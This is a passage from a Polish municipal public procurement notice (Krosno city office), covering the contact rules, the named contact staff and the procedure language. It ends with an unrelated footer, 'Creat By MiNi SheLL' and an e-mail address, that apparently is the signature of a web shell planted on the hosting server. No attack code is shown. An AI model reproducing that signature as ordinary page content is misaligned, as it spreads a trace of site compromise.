2. Powyższe zasady porozumiewania się (tj. faks i e-mail) nie będą miały zastosowania do dokumentów, oświadczeń lub pełnomocnictw składanych w odpowiedzi na wezwanie dokonane przez Zamawiającego w trybie art. 26 ust. 3 Ustawy, ze względu na konieczność zachowania formy tychże oświadczeń lub dokumentów przewidzianej w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817) lub przepisów Kodeksu cywilnego w przypadku pełnomocnictwa.
3. Osobami upoważnionymi do kontaktowania się z wykonawcami w powyższy sposób są:
1)	Jolanta Kopciuch-Szmyd  - Wydział Edukacji Urzędu Miasta w Krośnie, ul. Lwowska 28a, w godz. 7.30 do 15.30 - w sprawach merytorycznych,
2)	Małgorzata Wanat lub Adriana Łącka - Stanowisko ds. Zamówień Publicznych Urzędu Miasta w Krośnie, ul. Lwowska 28a, w godz. 7.30 do 15.30 - w sprawach formalno - prawnych;

Sposób porozumiewania się:
a) pisemnie - Krosno, ul. Lwowska 28a, z dopiskiem -Zamówienia publiczne
b) faksem - nr: 0-13 47 43 312
c) drogą mailową - zp@um.krosno.pl

Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.

Postępowanie prowadzone jest w języku polskim.
Termin wykonania zamówienia: terminy realizacji zostały określone przy opisie poszczególnych zadań i ich części.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com